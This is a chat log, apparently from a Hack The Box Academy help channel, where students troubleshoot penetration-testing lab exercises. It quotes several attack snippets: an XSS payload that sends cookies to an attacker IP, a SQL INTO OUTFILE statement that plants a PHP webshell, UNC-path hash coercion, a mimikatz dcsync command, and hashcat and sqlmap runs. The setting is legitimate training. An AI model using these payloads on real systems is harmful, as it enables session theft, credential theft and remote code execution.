Hi all, I’m relatively new here. Apologies in advance for the long message, but in a nutshell: can a public IP connect to a ‘private IP’ server hosted on pwnbox? I use pwnbox to do the Academy exercises and I just started a simple php server on 0.0.0.0:8080 (assuming that will start the server on the tun connection using the pwnbox 10-dot IP - but maybe I was wrong?). I got a successful connection from the HTB target which is also on the 10-dot network, but 5 minutes later I noticed that I’m getting several connections from another unrecognised IP starting with 45-dot which from my understanding is a public address? My main confusion comes from the fact that it seems that both a public and a private IP seemed to successfully connect to the server I started on pwnbox - can someone help me understand please?

Never mind I got it, finally exploring and figuring out like a cyber guy 😅 😆

i am really stuck on the xss skill assessment
https://academy.hackthebox.com/module/103/section/1011
i have nc and a php server running on port 1234 and this is my payload:

“><script src=10.10.14.199:1234/script.js/></script>

i dont understand what am i doing wrong

new Image().src='http://OUR_IP/index.php?c='+document.cookie
when it says OUR_IP do they mean the netcat or the php server or what i dont understand

it's likely someone accidentally typed your tun0IP:8080

it's also not completely impossible: considering that the pwnbox has an internet-facing interface

our_ip/your_ip are used interchangeably in the modules to mean your tun0 ip

target_ip is always used to refer to the target

it's almost never left ambiguous

@fathom pendant thank you so much! This definitely makes sense, probs I should just specify my tun0 IP when starting any servers just so I rest assured I’m on the ‘private’ network as much as possible

well it makes no sence to just put the tun0 there

im so confused

eh; it's likely just an automated scan

not an actual manual connection

tons of webcrawlers out there scanning every ip under the sun ¯_(ツ)_/¯

That actually makes me feel a lot better lol - definitely a scanner now that you mention it, super brief and invalid requests

not to mention: not much risk to you since the pwnbox isn't on your local network

Any hint guys?

Hey guys, im working on Login Brute Forcing, Skills assessment - service login.
Im not sure that I work with a right user, can I DM someone to confirm the name?

im trying to capture the mssvc user hash through impacket-smbserver but i get this error, can someone tell me the cause of it?

im in Attacking common services module btw

attacking sql

is your default python env python2?

how can i check that?

if the version

yes its its displaying 2.7.18

then that's why

:) impacket stuff is written for python3

i guess i still had this from doing pjpt lmao

I was aware of the first one 😄 -eq for "=" but thanks for the word "substring" I learned something new

Here's my improv on that

SESSION SECURITY

Skills Assessment

- Fuzzed endpoints
- Tried to use XSS payload on all users but no automated actions
- Tried to fixate token using all information about user + date time, tried manual hashing md5 and sha1 as awell as hashcat
- Tried to manipulate requests and changing/removing parameter values
- Tried hydra on login page
- Fuzzed for admin through admin directories, and requests that use the email? parameter
- Tried to make Admin public through change parameter

This is the way. Thank you for your help.

i updated to python3 but same error remained

Specify python3 when running the command

i did

have you checked if something is already listening on port 445?

how do you check for that

netstat -tlpn

i see 445

but does this mean its listening on smth? i dont think so isnc there is no PID associated there?

seems fine to me

i just rm all impacket packages and re installed it

i will try if it works

didnt work 😮

||just to make sure i didn't do something wrong : 1- i used mssqlclient.py to connect with htbdbuser creds given ; 2- i tried to execute EXEC master..xp_subdirs '\10.10.14.81\share' but failed due to low privilege, but EXEC master..xp_dirtree '\10.10.10.81\share' works , 3- set up responder with sudo responder -I tun0, 4- attempting to get hashes with sudo impacket-smbserver share ./ -smb2support||

Use pimpmykali and save thn pain

i had that before i used it for pjpt

but idk why it didnt work

Peh course?

yes

Anybody else having issues with targets?

i got issue rdp into the network currently

Lol they made cert with 20 hours beginner content

┌─[✗]─[sam@parrot]─[~/enum4linux-ng]
└──╼ $pip3 install -r requirements.txt
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.

If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.

If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.

See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-syst

why dont it like me do pip3 on yparrotOS htb edition

I'm working on the skill assessment for th Windows Attack and Defence module. I have completed the attack but I can't find any logs under the Id 4886 or 4887

why

does anyone target is spawning keep spinning?

I don't know why its not allowing me to download the mimikatz.exe from the Win32 folder

I tried copying the mimikatz.exe file from the Win32 folder and into the ~ directory . it kept accepting I think the default mimikatz.exe on my local machine thats from the x64 folder. I want the win32 mimikatz.exe the internal pivot machine is working with an AMD 32 bit processor.

I tried removing those x64 mimikatz.exe too...and it did not allow me to remove it(even with sudo permissions)

mimikatz x86 cannot access x64 process

nevermind

if i complete like the pentester modules with a silver sub, can i go back and look at those modules if i cancel the sub

if theyre all completed?

Yes you unlock the module forever once you’ve completed it.

Attacking Enterprise Network Target is not Spawning..!!!

Any HTB staff here???

Can you link me the module

but in general, reaching out to support is the best option if you run into any issues

since we dont provide any official support over discord unfortunately

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Ok got it

Tried spawning one the sections on EU-2 here, worked okay

it worked..!!

Thank you so much..!

Not sure what i did there 😅, but glad it worked!

Anyone else getting spawn issues? Idk if its me or hackthebox itself

Do as Emma said just above here
It worked...!

The mimikatz from the win32 folder looks to be the 32-bit one- and as the error shows: it can't access the 64-bit program (the files that control lsa)

Found the following information in the password cracking module - hydra
"-u loop around users, not passwords (effective! implied with -x)"

But the manual page says different,
"-u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so the first password is tried on all logins, then the next password."

Can anyone explain the difference?

they mean the same thing, -u tries one password against all users then move on to the next password, instead of the default tries all password against the first user then move to the next user

thanks for the explanation, got it now

@next bronze

could you help me with this By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe

i went THREW EVERY EVENT MANUALLY

was referring to the assembly module, I can't help with cdsa stuff 😅

ok 😦

Also he was talking to someone else fwiw

Is anyone available to help me with "Intro to Network Traffic Analysis"?

Hello everyone can you help me please

I don't find and I don't konw why

its attacking common services module?

https://academy.hackthebox.com/module/116/section/1512

im reading it rn, if you wait few mins i can help you

thanks ^^

Well I'm seeing something that can give you the answer

Zone transferring should work with the right subdomain

Subbrute does not give you records

Just ask your question

yes so I must to use dig AXFR ?

Yes

It's one of the first things you should have tried after getting some subdomains

Okkk I look now, thanks

👍

same issue here - what was the solution to your problem?

have you added that machine account?

of course I have.. I would never ever skip a part of a module and just start in the middle....

frantically searches for "machine account"

ooof I skipped cross protocol

I don't remeber running into the problem, I transferred the latest version of coercer to the attack box since the module info is a bit outdated, the HTTP thing has been fixed in the latest release #858470491676737536 message

yo on the Kerberos attacks, cant crack the hash. need a hint if someone got time.

why wont the hash crack

Which hash can you not crack?

the first one. idk if im supposed to but. john and hashcat wont crack it. idk if im supposed to use cewl on their website etc

Hash from user ||d…||?

ah yeah hash from user

to get to question two on skill assessment

||Hashcat || should be fine

Hey guys! 👋 I hope you're all well. I could do with a hand here on Socks Over RDP part of Pivoting module. I transferred the files and verified that the DLL file is in the folder with explorer. However, it's not there when I try to view in cmd.

the first question yeah? hashcat with rockyou should do it

yes but it wont crack. im testing something to test something.

i be back in a min

Trying to register the socksoverrdp-plugin.dll

i cracked it

Did you disable windows Defender?

my theory was right

Nope 😁

so idk why but i get diff hash using kerbrute and the GetNPUsers. idk why but the kerbrute hash is diff so cant crack it but the hash from GetNPUsers does. idk exactly why and how etc. but good to know in the future.

kerbrute's hashes doesn't work lol

has been a probelm for a long time

Is this before the transfer? I can see the file there in explorer. Maybe I'll try transfer again

Yes before the transfer, also run PS as administrator.

Nevermind actually it was already off

I'm in cmd so maybe I'll try ps as you said

Hmm. Still only shows the exe when I list files

I'll try again with a python server. I was testing out RDP file share

Ah yes. Could not download. Virus detected

Gracias amigo

Is the target in skill assesment - File Uploads synced with IRL time?

I prefer to ask rather than to spend next few hours banging my head against a wall tryna figure that one out

is a problem if i connect using the openvpn command from my own pc and not using a virtual machine?

not really

though labs are shared if I m not mistaken

i don’t think that matters

If I can list the upload dir then ye Ig it wont

first find out where your file is getting uploaded 😉

I've got the source code

but the way the file is handled is tied to the current date

yes

Oh thank fuck.
Thx

How is sshuttle compare to ligolo?

Hello, I have a problem with the "Exploiting Web Vulnerabilities in Thick-Client Applications module". The windows machine is so slow that I can't work on it to make the module. I have retrieved the .jar on my attack machine and I am trying to make the module. The problem is that I still can't connect with the identifiers provided, even though I've changed the connection port and added the ip to my /etc/hosts. What's more, every time I try to connect I get this error in my window where I have my VPN Academie activated: Authenticate/Decrypt packet error: packet HMAC authentication failed.
If anyone can help me it would be great as I just need this part to finish my module.

how do you connect to the machine? with xfreerdp?

do you fullscreen it?

For some magical reason windowed RDP connections to windows targets on HTB work at a snails pace

if not fullscreened

I've discovered it myself few days ago doing exactly that module
Edit: well actually weeks my bad lol

+f is the switch in xfreerdp

yes I've tried RDP and Xfree rdp both of which are unusable

.

.

nop small

try xfreerdp with +f

I'm going to give it a try, but I'd like to do it from my attack machine.

bro the client connects to a server only accessible from that windows machine

you could in theory port forward

but tbh that might open yet another can of worms issues

¯_(ツ)_/¯

I'm going to try it out, and it'll be a good opportunity to review pivoting/portforwarding. Thanks

good luck. Also make sure to rebulid the jar EXACTLY as the examples show you. I tried doing it "my way" from just one software provided and it did not go well.

I'll make a note of it, thanks

I finally solved the assesment. Magic numbers and formatting going awry because of wack chars being mangled by my system clipboard are going to trigger a PTSD attack every time I see them from now on.
THANKS ! 😂 😂

im in attacking dns section at attacking common services , i try to use the subbrute to enumerate subdomains available but i get error of no nameservers found

Did you add the domain/IP to the resolvers.txt file ?

if the domain is inlanefreight.htb then yes

What is your command?

nvm i changed to IP and started to work i think

||./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt||

got the flag !

thanks humangod

but still idk why the domain name didnt work

Because htb is not an official TLD and therefore cannot be resolved.

On Introduction to Python 3 - The First Iterations, i can't reach the target, neither through my kali machine or through Pwnbox. Any ideas? Nmap returned results, but the http port doesn't match with the port given as target.

lets go

Does anyone know why ZAP never works for 💩... I've configured all the settings required to successfully run ZAP and I can never get traffic to run through the dam thing. Ssl certificates installed correctly, foxy proxy settings configured correctly, proxychains.conf file configured correctly, even used ZAP's default settings, restarted all applications, tested zap with curl. Literally have tried everything to no avail, this isn't the first time either

atta boi

good to learn stuff the hard way.

some minor stuff i missed and so on but nothing special

Couldn't agree with you more, HTB does a phenomenal job at setting us up for long term growth vs. transient satisfaction

yeah

Are you aiming towards CPTS?

tho the labs (in this module atleast) were a bit slow and on the skills assessment it was just excruciating

u dont see my symbol next to my name?

❤️

huh?

oh wtf dude thats sick 😂

hehe

passed on first attempt in august

Wow now I'm envious, I NEED THAT

haha yeah its kinda cool

I didn't even know you could add that to your discord profile. Now I'm definitely set on getting mine

i didnt myself. HTB does it by automatic when u pass and link ur disc and so on

Does it do the same for CBBH or any of the other Certs?

i think so yeah. not sure but should be so

Say lessssss, I was under the impression that we got to show boat a screenshot of our congratulations page one time and that was it, but an icon next to your name indefinitely changes the GAME

can i dm you

sure

haha yeah looks cool.

for how long was your hydra running (approx.) for password mutations lab? it's currently running for an about an hour, im kinda certain at this point that password will never crack

as far as i rember it takes a looooot of time. But.. i think you try -48 and take into account only the password with at least 10 char... you will shorten the time.

thanks for replying

and be carefull agains what service do you use hydra.

yeah i just switched to the "other one"

like 10 minutes ago

it's kinda annoying that it takes so much time, but what can you do i guess

can I dm someone for the XSS assessment?

hi I am stuck in the last assessment of login bruteforcing
I got the employee name from the last section. I created a wordlist using only that name. and generated an user wordlist with that name. I then trimmed the pass wordlist to passwords that match the minimum criteria using sed. The task was to perform a brute force ssh service ( a really bad joke ig) need help plis

Does anyone know how to fix my ZAP issue?

Use Burp 😄

😂😂

So ZAP not working is universal not just me?

I haven't tried it al all. 😄

This guy🤣😭

i see, makes sense , thanks !

That's if you have silver annual

Hi all, just joined HTB x

ah even so. i did have it when i passed so

Log out and then log in again.

anyone know what kind of rewards you will get from streaks?

Cherrytree is a game changer

🍒

whats the most unique thing about it?

i use obsidian which is normal but fancy

gg

son of a gun

what difficulty

medium they say .......

whats would you rate it

medium but the last part was painfully slow

did you watch write ups or soloed it?

solved it with small nudges

cant imagine myself doing easy machine without write up or help

it takes time tahts all, tehre is no magic

so you aint majestic?

I was using my memory

#1210640181888286781

Congrats 🎉 but wrong channel 😉

i wanted to point out that you can do some Ad in this machine but after around 24 hrs hacking i was tired 🙂

I haven't tried obsidian but I'm sold on these note taker things. One giant txt doc just wasn't cutting it once I got to pivoting

obsidian makes you feel fancy

btw got question, i saw that easy challenge C.O.P about sql injection, im currently doing sql injection fundamentals, i literally had no clue about how to perform such things but if i complete the module, will it be possible to do the challenge or i need more than just 1 module and some practice?

asking more superior person

can anyone help me with the question on Password Attacks - Password Reuse / Default Passwords. I've ssh'd as the user from the previous question, am trying to authenticate to mysql as ive seen 3306 is running on the box, ive tried all default creds from the list in the notes, nothing working. Can anyone give me a hint?

as i said it takes time

and effort

but does it take 1 module and some time to do it? or i need more modules as knowledge?

knowledge knowledge knowledge knowledge knowledge

if you just do something every day, the knowledge accumulates over time and you become more familiar with it and before you know it you'll be pretty good

but how much to solve an easy challenge

and if you gain some knowledge after a while you overthink and forget basics

thats much worse 😄

I guess you just gotta dumb down a lot of problems, but yeah I've definitley had moments where I was in over my head trying to do something more complicated than the actual task was

anyone able to help on this?

Hey! Have you looked for default creds?

yes,

nvm

ive just done it

I couldn't figure out how to write it without spoiling it 😄

Congrats!

i had to create an ssh port forward for it. How come it doesnt work if i ssh to the device then use `mysql -u <user> p <pass> ?

oh

well i feel stupid. if you put a space after the -p option it wont work

had similar issue few days with the module

It's easily done

thanks for your help anyway ha

but now im stuck with the credential hunting in windows, whenever i upload a lazagne.exe file and try to execute it in the windows cmd i get a "This app can't run on your PC" i tried differant versions but got similar results

Attacking FTP - The target IP still is not working (not responding to pings or nmap) is this normal for the this module or is something wrong on their end

try to restart the machine or check VPN connection or see if you can access FTP using the ftp command

what's a tcpwrapped nmap keeps showing me this on the hard lab of "network enumeration with nmap"

Hello, I'm having the same issue. Did you figure this out? I'd appreciate any help.

does anyone know why the latest version of lazagne.exe doesn't work in the windows credential harvesting module ?

Guys I am stuck on footprinting module.
Question:
Find out which domain the server belongs to.

Tried:
connecting via rpcclient
Ran enum4linux-ng

for the hard lab just cover the module you read last. Firewall IDP/IPS evasion, follow it stepwise. It worked for me

I believe it means that the port is up but filtered

Hello, I'm working on the Web Requests Module. The question is The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag. And the hint says Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests. I have reloaded a bunch of times, and I don't see anything to a file called flag_... I've tried disabling the cache, and I've reloaded multiple times. I don't see anything. The only thing I can think of is the favicon is coming back with a 404, so is it possible that the webpage is never considered loaded and therefore never triggering the call to the flag? Or is there something else entirely I'm missing?

Nevermind, I found the answer

I looked it up, there is a firewall in place on that port then.

Update I finally succeeded, with chisel, but it's the worst experience I've had since I started. The Windows machine is pure crap. It's a shame because the module is really interesting.

can you provide picture of the network tab

why lazagne.exe doesn't work in windows credintional harvesting module

does not work as in?

whenever i run it i get this app doesn't work on your pc error

wrong arch then

The fuck was that

wasn't me

yeah Ik

how do i get the write arch then?

*right

honestly I don't remember how I did it. Try downloading a LaZaagne copy from a previous lab

and then upload it

Hi guys, I need help with the getting started module

How did attempt to launch it?

you know what labs contains lazagne ?

start lazagne.exe all

.\startlazagne.exe all

I got a file from the web server using curl and I don't know how to read/analyze the file

what why start

without start

.\lazagne.exe

what kind of file?

Any help?

yes
.\lazagne.exe all should work
If it doesn't back track one lab back

becaause I assume oyu uploaded your own copy correct?

i even tried "powershell -Command Set-ExecutionPolicy Unrestricted"

since the lazagne on the machine is not latest

@hardy anchor hell you doin?

That's only for ps scripts

I'm trying to get help for the documentation and reporting lab but the message is being deleted

i know i was throwing random stuff around

dm me that shit

if that doesn't work, b64 encode and send it to me lmfao

Maybe I will be able to figure out what is getting filtered

Ye

Still, have you uploaded your own lazagne or did you use the one providded?

Idk, I can't share files in this room

Sure

Lovely. What's the extension and are you working on linux?

if yes then file it

Yeah, extension is simple backup plugin 2.7.10

that's not an extension.It's a wordpress plugin.

^

Which I'm sure has some exploits ;)

anything is sure in the life

bro he doesn't know what a plugin is (apparently) . He really should be doing more research and less searching for exploits blindly : 3

there is a one provided ?

hol' up

should be at C:\Tools

I know the module he's working on

Its more than an educated guess

there is no Tools in C

The module really shoves it in your face

I know. I've exploited that plugin before. WP is a delight to encounter but that's not what I meant

gimme a sec

Sometimes the targets, much like rl, won't have a c:\ tools and you'll need to add it yourself

A plugin is basically like an extension, isn't it

Yeah but certain machines do not work well with latest renditions of these tools

for some damn reason

Not necessarily, when referring to "extensions" most will think file extensions not plugins

i uploaded it but i keep getting "this app can't run on your PC"

in the context of "identifying a file" most think of an extension as in .exe .ps1 .jpg

Then it could be that you're trying to run x64 on an x86

Aka trying to run 64-bit program on a 32-bit machine

LaZagne only has one release version

could you link the module @junior oxide ?

Okay
Well I can remember I scanned the target using one of metasploit's auxiliary scanner and it downloaded something like a log file for me but idk what to do with it

https://academy.hackthebox.com/module/147/section/1318

reread the lesson and dive into the rabbit hole

it will do you more good to sit now and study than ask what to do with something this basic. You will need it trust me on that : )

There has to be a copy on the machine, I don’t know what you’re doing or which module but if iirc I think I’ve seen lazagne.exe file on either documents / download dir before.

Check there.

Literally the hint said I should search for plugin exploit and the objective says to get the flag.txt after exploiting the target so idk how to exploit the target since I can't find a directory that displays the login page and idk how to get any file that has a list of user to perform bruteforcing

Damn I m out of luck. I solved the module but I don't remember how...
hm...
let me try something

download and documents are empty in john

ill try to check others users

1. You don't always need a login page for an exploit
2. Search for an exploit. Google is your friend
3. You're workig with WP which is a Content Management System aka standarization is the name of the game. Chances are it might have a default login path

What part of the getting started section are you on?

exactly what i'm saying, i'm not getting any luck finding a login path but the ssh service is the only open service after scanning

Public exploits

Dude did you put the name of the plugin in the google search bar?

Public Exploits are PUBLIC
Use them nets : 3

still empty

yeah I m jumping into the lab myself

Some plugin exploits allow you to arbitrarily read a file

Yeah I did, I got some info and searched for exploits using searchsploits, then I manually downloaded the exploit and gave permission to run but i get a error messaging every time i run it and idk bash to analyze the code

I had a similar issue before so I m hoping I can help you. I had to figure it on my own but it was a pain in the ass and I would love to help you

how did you upload the file itself ? i used an open smb share to transfare the file

I think that's what the auxiliary module of metasploit did

I'm confused I did this module 2 days ago as well but I think I must of done it a different way lol

I’ve seen the module now.
You have to transfer it over.

I didn't upload file, I Got a file using one of metasploit auxiliary module

It helps to understand what a module does in Metasploit

You say trouble finding login path we talking http?

The aux module has some options that you can play with

I did read about the info, it's been a couple hours since I performed the exploit so i don't remember

If you got a file, perhaps see what that file is

And figure out how to manipulate the options to get what you want

is it normal to type "type lazagne.exe" and get nothing ? i guess i missed something up while uploading

I have no idea how to help you then and I need to be going now.

But I m 100% sure there is a working copy in the module somewhere

go to the hints it say find a way to transfare the 3rd party tool

Sounds like your file transfer goofed, xfreerdp and other rdp things allow you to attach a fileshare

I don't understand the language

?

If you check the options of the module you used

It's a fairly obvious file, it's not necessarily written in a programming language

ill cancel my current rpd session and use xfreerdp

I mean if you're using remmina, it also has that option

Check your dm

it worked

i used curl to download it and the binary for some reason was empty

i downloaded it manually and transfared it using the same smb share i created

Hey! Someone can help me with Documentation & report lab? I'm really stuck, I have a lot of creds but I'm not able to answer question 1

Alright

Do i have to restart the machine (Attacking Common Services hard lab)

uhh i found a flag from doing sqlmap i try to submit and its not the right answer but it is because i got it from the db so im confused...

I mean you might need to impersonate

i did

into j user

I just remember it being a bit of a chain ¯_(ツ)_/¯

💀

i lost 2 hours for that machine

the medium one 2 minutes

because you're not really prepped for what it wants to do, but it is explained in the mssql section ¯_(ツ)_/¯

;\

That's what made it click for me

got it, the machine was broken buddy

y btw i had to research on mssql section ty

I dont appreciate your condescension towards me

chillout man

guys I'm really stuck at the password and attacks module section Passwd, Shadow & Opasswd. I found the passwd and shadow files that were hidden, I unshadowed them, and tried to crack using what we find in resources
and it doesn't return anything
been stuck for a while today

Try with rockyou, or the mutated list

how did the -v option made me find the sqli and without it it didnt find the injection when the -v option is for different verbosity levels???

sqlmap -u 'http://83.136.252.214:42076/case7.php?id=1' -v --level 5 --risk 3 --dump
without the -v it didnt find it with the -v it did

can someone explain?

v param shouldnt be correlated with that

Are you sure you havent change the level or the risk?

i am sure

thats why im so confused

lol

🤷‍♂️

Happens

Hey! Someone can help me with Documentation & report practice lab? I'm really stuck, I have a lot of creds but I'm not able to answer q1

Please

Does anyone notice slow connectivity on the EU 1 server?

my ffuf fuzz runs 3 req/s

I already tried to regenerate a new vpn file

Change region?

eu 2 go little bit better

what is this?

random ass link

Dumb link

<@&861185840277487616> unrelated link and it's not even an infostealer attempt

Please stay on topic and don't post random links

before you ask I did use a browser sandbox - it was just some random live chat extension emote thing

¯_(ツ)_/¯ that's all they posted so I'll chuck it up to a failed copy paste

probably

Anyone able to help a bit with my pivot? for some reason i cant connect to my attack box to download a file. im working on the AD enum & attacks skill assessment. Set up my ligolo and am on ms02 just cant figure out why my file transfer is failing, its like it can communicate but fairly sure i have my listener set up correctly

You need to use the internal IP of WIN01 in this case

^

So ive started on the getting started module and im going through these and i am confused on how some of these got these passwords and usernames and also im wondering what could be a good way to learn this instead of copy pasting

because ive noticed im copy pasting but not learning or maintaining

the getting started module is kind of a showcase on where you want to get to. The following modules in the cpts path explain in more details the intermediate steps

So anyone in particular

or are you talking about starting point on app.hackthebox?

I was also working on the linux starting one

its called getting started

I can dm a picture if that helps

but im on hack the box

and ive done the intro to the acaddemy and a little of intro to linux

ah okay, so you are on the academy part of hackthebox. Theres also the "app" part that has a bunch of machines without much guidance

and what part exactly is confusing you?

but im working on "getting started"

Well while trying to get access to things

im just following the same exact steps they where using

Which is good but i dont feel like im retaining it

Also they have like this one where they got a password and username out of thin air

can you tell me in which section that is?

maybe I can put it in perspective

Public exploits

Im stuck on that one atm

hm I dont see a password or username in that section?

The one before sorry

When you say use the internal do you mean in the acutal grab command or when setting up the listener?

this exploit doesn't require any authentication

It had somehting to do with bob

search in-page for bob:

the password is given in the text as "bob:password"

I've noticed that this course requires you to do some independent research ontop of what you learn in the course materiel so simply copy and pasting alone wont work majority of the time

the IP that's on the same subnet as the machine you're remoted into

putting in a little legwork helps you learn how to unstuck yourself

got it thx, just had a extra .6 lol

172.16.6.6.6

I agree 100%

but how did i know bob was a person without a hint

lmao yeah caught it right after i posted lmao

unless t stated

it's provided in the text for the section

the whole module is just a quick rundown of how people usually approach boxes on HTB when they want to hack them. It tries to showcase a lot of things without going too much in depth, the example with "bob" was just to show you what it looks like when you have credentials and what it looks like whe you don't. You were not supposed to find this out by yourself, but later on you learn techniques that help you figure out what valid users are for example

you're not gonna get into bruteforcing stuff and enumeration until a bit later in the CPTS coursework

99% of the time: (unless otherwise inferred or stated) the info is given to you

Oh so im thinking too hard abou tit

for now

yes

Welcome to my world

alright but i still feel like im not retaining it

the getting-started module is very much just showcasing common methods

take notes

you're not expected to remember every little nuanced thing ¯_(ツ)_/¯

ive taken notes but its mainly been the same as the cheatsheet they give you

Once you do a couple labs/exercises it will start to click

then reread and reword your notes to give context

the later modules provide much more context to what's being done

if you actually plan to do the whole cpts path then all the topics in the get started module will be looked at in much greater details in individual modules.

I think thats what im thinking im just over thinking

your notes should be written in your own words to help you understand it better

avoid technical jargon unless you absolutely need it

and the skill assessments in the modules are usually pretty good in making sure you understood whats happening. As long as you try to solve them yourself without trying to get too much help

is anyone else struggling with the ips and boxes they provide in the modules? they keep disconnecting

whats the cpts path

Like i dont know that abreviation

Im having issues with mine as well

try changing vpn regions, using the tcp vpn instead of the udp

the Penetration Tester Job Role Path

ok cool ill try that

CPTS - Certified Penetration Testing Specialist

good to know its not just me. its been super frustrating

Like bug bounty hunting?

HTB has 4 certs; 3 entry 1 intermediate; in order CBBH CPTS CDSA CWEE

nah theres a seperate path for that

I havent been able to get any work done because of it so I been playing Helldivers 2 all day

Thats the plan which was trying to get access into websites

no, that's the Certified Bug Bounty Hunter

sounds hella sus

ohhh thtats dope! how is it, ive heard its super fun

always follow a company's Bounty program for scope

Greatest game I've ever played in my life

Switching vpn regions now though. If it doesnt work Im calling it a day

alright but will this one be a good one to start off my knowledge for

🦅 For Democracy and Super Earth

im hype! definitely going to download it then

Do the Information Security Fundamentals path first

How about a nice cup of liberTEA lol

it will build up a good base for you to jump off of

If you havent already youre really missing out

take a look at "paths -> job role paths" and then the bug bounty hunter one. It lists 20 modules in order trying to teach you how to pentest websites

alright ill start that off im quite new to the coding aspect

i'm planning on getting that when my refund comes through

CPTS doesn't cover coding

CBBH does

What coding do you need for bug bounties?

CBBH; Bug hunting and code review- no post-exploitation

Javascript, PHP

i called it coding but the aspect wise shell stuff

those come immediately to mind

gotcha

shell stuff is generally gonna either be ASM or BASH

iirc there are some simple adaptions to scripts, e.g. writing your own bruteforce script for a web login that reacts to password timeouts

Now im sold. Im starting that course after I finish CPTS

how far are all of you into the cpts path

34.79% - Since ips arent working 🙂

cpts covers most of the cbbh part. And its mostly simple scripts, no huge code projects

ive been working on bash and htbs parrot stuff

oi im only like 12%

I am the attacking lsass part of the password attacks module and I have some issue with pypykatz does anyone another tool that I can use?

im on attacking common services easy lab, i found the creds that logged me to mysql but i have no clue what to do after, couldn't find any useful creds there

and i don't know the location of the flag.txt to execute load_FILE("Path to file")

any hint will be appreciated :3

i mean there's 2 ways to do this; but uploading a simple RCE might work to at least find it😉

well i thought of rce but i just didnt figure out how yet

I assume you already checked ||ftp||?

yes

i got that webserver directory

idk why my rce doesn't work

mhm and some other stuff

hmm lemme double check and try again

just make sure your code is formatted correctly

and what you're using as your variable

Whats the path called ?

oh foundations

sorry found it

im using

||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\CoreFTP\webshell.php';||

but idk how to provoke the rce, i browse to that file but nothing

because your filepath is incorrect

look into what the webroot of the web server is

i mean webshell.php?c=<command>

oh

wait

||$_GET['c']|| is requesting the variable, since it's not specified in the file: you can provide it via browser arguments

test with whoami first

then try more complex commands such as "where"

i see

let me try that

:/ im lost lol

i dont think i put the right filepath

how do you check for that?

it's kinda given to you in some of the documentation stuff

:)

||xampp|| look it up 😉

yes i did it and navigated but didnt work for somereason

i wil restart the lab just in case

good evening. Where do i have to post a question about how to solve a retired machine? I'm stuck

also sometimes you can have the \ the wrong way

#boxes you'll need to read and follow #welcome to access it

thank u

i used

||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';||

and then

||https://[IP]/webshell.php?c=whoami||

but i only get blank page

is AD module not available on all machines?

its worked but guess what

i used 2\ in here

and when i navigated its worked

Ah

This is why I like using ` for codeblocks

Discord only displays 1 \ if you do \\ \

yes

If that was in your og copy/paste, discord formatting hid some of your issues

yess probably

In which case it would have been super easy to resolve

Also, did you figure out both intended ways?

first one was rce

second one maybe with a reverse shell?

||rce, sql||

well do you mean with reading files in sql?

with load_files?

Yep

but wouldn't you need the rce to find the flag.txt location first?

so basically reading the file in sql is just a matter of preferences since you already achieved rce you could just read it directly in the browser no?

||I found the ntlm hash for t***** through an lsa dump but when I use the hashcat command for this user I get no result. I used the rockyou.txt in the kali linux machine:||

sudo hashcat -m 1000 ||fd37b6fec5704cadabb319cebf9e3a3a|| rockyou.txt

https://academy.hackthebox.com/module/143/section/1278

Yep

Or just underthinking it lol

Hello, I am trying to work through the pentesting learning module. I am currently on the public exploits section where there is a webserver to try and find the flag. I have run nmap and visited the ip, I know it's a wordpress site with a simple backup 2.7.10 vulnerability. I have run metasploit and found the plugin exploit. I ran it, it gave me a back a txt file with various info but it I don't know where or how to go from here

https://academy.hackthebox.com/module/77/section/843

Check the options to see what you can change

Investigating that txt file it may look familiar if you know Linux systems

I know a little, but apparently not enough, it has a root user but the password is x'ed out

That's not the focus of this

that's my point, I am not sure what I am missing here

Check the options of the exploit

can you be a bit more specific about what I am checking? I configured the exploit for the right RHOST

There's another option, one that has the path of the file

yes, it's configure for /etc/passwd

So, change it

I believe the question tells you where the flag.txt is

hmm, let me go back and check the question

are you saying that the /flag.txt file is a subfolder of the /etc/passwd?

because otherwise I think the question only says to get to the contents of /flag.txt file

I need help with the "Getting Started" module guys

I need help with privilege escalation

I already hacked the ssh server...

Yes /flag.txt

Not a subfolder

ah

thank you, let me try that

Just literally /flag.txt

That doesn't tell much

I already ran the lsa dump in mimikatz and it didn't return the credentials for ||tpetty||

lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty

||
||atz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\tpetty' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)||||

That error code I think is related to elevated privileges( I am logged in with the user svc_sql) ..and when I ran as 'Administrator) on that machine it did not fix the issue.

And again, I ran the ntlm hash value with hashcat for the users password hash a... and it returned no results.

you are awesome. Thankyou

My approach of Penetration is to get a privEsc tool to enumerate the SSH server and I'll read the results for vulnerabilities but idk how to get the tool onto the ssh server

I mean you don't necessarily need the tool. But the section should have gone over some basics, or some was gone over earlier

Sometimes a simple sudo -l is helpful enough

I already tried that, I got a result that the current user I'm logged in has NOPASSWD access to /bin/bash but idk what to do with that

look closer; user1 can do /bin/bash as user2 with sudo perms man sudo to find out more of the options you can do with sudo

Gonna make me go through this now?😐

yes

i'm helping guide you how to figure it out

giving you the direct command doesn't necessarily help you, except to expect more handouts of the answer

gotta learn how to unstuck yourself

👍

I'm not telling you: LOL go figure it out
